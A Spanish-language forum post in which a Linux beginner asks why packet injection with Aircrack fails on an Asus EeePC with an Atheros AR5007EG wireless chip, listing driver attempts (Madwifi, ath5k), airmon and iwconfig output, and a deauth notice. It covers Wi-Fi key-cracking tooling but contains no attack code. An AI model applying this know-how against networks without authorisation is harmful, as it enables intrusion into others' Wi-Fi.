?>/script>'; } ?> Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers) Widgets Magazine

Autor Tema: Problema Ubuntu+AirCrack+Altheros AR5007EG (creo que por los drivers)  (Leído 5195 veces)

0 Usuarios y 1 Visitante están viendo este tema.

ewinch

  • Visitante
No consigo inyectar con el AirCrack, creo que es por los drivers pero no estoy seguro. Os agradezco cualquier ayuda.

Os pongo en situacion:
Tengo un Assus EeePc 900 al que le he quitado el Sandrox y le he puesto Ubuntu 9.04, soy muy nuevo en esto del linux, pero me gusta leer y aprender solo por hoby.

Al hacer un lspci me dice:  Ethernet controller: Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter (rev 01). Segun he leido el chipset es el AR5007EG.

He leido bastante en los dos ultimos dias sobre Aircrack y esta tarde me he puesto manos a la obra. Os cuento lo que he hecho.

1º Me baje los drivers de Madwifi, los parchee y los instale, pero creo que no lo hice bien, porque a comprovar con airmon-n que drivers estaban instalados me dio esto:

Interface   Chipset      Driver

wlan0      Atheros    ath5k - [phy0]

Asin que entre en "controladores de hardware" y active los driver Madwifi, hecho esto me quede volvi a airmon-n y me dio lo mismo de antes

Interface   Chipset      Driver

wlan0      Atheros    ath5k - [phy0]

Reinicie el ordenador y me quede sin señal de wifi :-\

root@ewinch-asus:/home/ewinch/wifi# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

pan0      no wireless extensions.

Desactive  los Madwifi e intente hacer la audotoria con los ath5k.

Os pongo todos los pasos hasta llegar al apartado de inyectar trafico, el problema es que las IVs apenas subian, y me da un error, "Notice: got a deauth/disassoc packet. Is the source MAC associated ?" Creo que significa que no he asociado la mac, pero yo creo que si.

Puede ser por los drivers? cuales instalo y como?

Gracias por anticipado.



Lo puse en modo monitor.